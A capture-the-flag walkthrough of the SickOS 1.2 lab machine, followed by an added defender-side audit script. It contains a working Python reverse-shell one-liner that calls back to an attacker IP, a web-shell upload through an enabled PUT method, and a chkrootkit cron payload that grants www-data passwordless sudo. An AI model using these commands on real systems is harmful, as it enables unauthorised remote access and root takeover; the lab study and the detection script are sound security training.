SickOS 1.2 WalkThrough

Kamran Saifullah
5 min read · Apr 14, 2018


Hi,

SickOS 1.2 was fun to exploit. It took most of my time near the end, when I had to gain root access. Let's move on.

It can be downloaded from:

https://www.vulnhub.com/entry/sickos-12,144/

As always, the first step is to find the IP address.

Once we have the IP address, the next step is a port scan.

The results show that two ports are open: SSH and HTTP, which means a website should be running. So let's check it in the browser.

Ouch. Nothing serious, just a meme, and nothing juicy in the source code either. So I ran Nikto to check for any vulnerabilities and found nothing.

Now what? Something is going on there. Let’s try running dirb to look for hidden directories.

Yes, we have found a “/test” directory. Let's go back to the browser and check what's in there.

Okay! So it's simply a directory listing and nothing else. So far we have found nothing that can lead to root access on SickOS 1.2. Now what?

Here comes curl. Let's check whether any evil HTTP methods are available.

So here is the first step: the PUT method is enabled, which means we can upload files to the directory. B00M! Now what?

Let's try uploading a web shell, which in return will give us a command line to execute OS commands.

Now back to the browser. Adding ?cmd= to execute our commands, and yes, it is working.

Now we can make a reverse connection back to our machine via a reverse shell. Where to get the shells? Pentest Monkey is there :)

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Make the request via the browser while keeping netcat in listening mode. I tried ports 445 and 4444 and they didn't work. It worked on port 443, and all we got is a limited shell.

We could upload the PHP reverse shell as well. As I used it in my previous walkthrough, I decided to use the Python shell this time; both work the same.

Netcat has received the reverse connection/shell.

After spending some time I found nothing to exploit in order to gain root access. After a bit more looking around I noticed a cron job that runs chkrootkit daily. This stood out as something to look into.

After this I quickly googled for chkrootkit-related exploits and found this one on Exploit-DB:

It was for version 0.49, so I had to confirm whether the installed chkrootkit is the same version before moving on to exploiting the vulnerability.

The version is the same. A quick Google search showed that it is vulnerable to a local root exploit if it is run from a cron task.

What is a cron task?

The next process was simple:

# ls -lah /etc/cron* 2>/dev/null | grep chkrootkit

Now all we have to do is place the malicious file at /tmp/update and wait for the cron job to run it:

# echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Once done, simply run:

# sudo su
# id
uid=0(root) gid=0(root) groups=0(root)
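The chain above relies on three conditions an administrator can observe: a cron job that runs chkrootkit, a planted /tmp/update hook, and a sudoers file altered to grant www-data NOPASSWD rights. The audit script below is an added example (not from the walkthrough) that checks for them from the defender's side; it assumes GNU stat (with a BSD fallback) and takes paths as parameters so it can run against constructed sample files or against the live system.

```shell
#!/bin/sh
# Added defender-side audit; not part of the original walkthrough.
# Every check takes a path argument so it can run on constructed fixtures
# (demo) or on the real filesystem (audit /).

# 0 if any file under ROOT/cron* mentions chkrootkit, non-zero otherwise.
cron_runs_chkrootkit() {
    grep -rl 'chkrootkit' "$1"/cron* 2>/dev/null
}

# 0 if the hook file a cron-run chkrootkit 0.49 would execute exists.
tmp_update_hook_present() {
    [ -e "$1/update" ]
}

# Number of sudoers lines giving www-data NOPASSWD (prints 0 if none).
sudoers_nopasswd_count() {
    count=$(grep -c '^www-data[[:space:]].*NOPASSWD' "$1" 2>/dev/null || true)
    echo "${count:-0}"
}

# 0 if sudoers keeps its expected 0440/0400 mode (GNU stat, BSD fallback).
sudoers_mode_ok() {
    mode=$(stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1")
    [ "$mode" = "440" ] || [ "$mode" = "400" ]
}

# Run all checks under ROOT (expects ROOT/etc and ROOT/tmp); print the count.
audit() {
    n=0
    cron_runs_chkrootkit "$1/etc" >/dev/null && n=$((n + 1))
    tmp_update_hook_present "$1/tmp" && n=$((n + 1))
    [ "$(sudoers_nopasswd_count "$1/etc/sudoers")" -gt 0 ] && n=$((n + 1))
    sudoers_mode_ok "$1/etc/sudoers" || n=$((n + 1))
    echo "$n"
}

# Constructed fixture reproducing the post-exploitation state described above.
demo() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/cron.daily" "$d/tmp"
    printf '#!/bin/sh\n/usr/sbin/chkrootkit -q\n' > "$d/etc/cron.daily/chkrootkit"
    printf 'root ALL=(ALL) ALL\nwww-data ALL=NOPASSWD: ALL\n' > "$d/etc/sudoers"
    chmod 440 "$d/etc/sudoers"
    : > "$d/tmp/update"
    audit "$d"          # prints 3: cron job, hook file, NOPASSWD line
    rm -rf "$d"
}
```

On a real host, `audit /` reports the same three findings; a count above zero for the hook or the NOPASSWD line is the signal worth investigating.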

Now we have root access. Finding the flag is simple.

# cd /root
# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

That's it. We have successfully completed SickOS 1.2.

I hope you enjoyed the WalkThrough.

Best Regards,

Kamran Saifullah
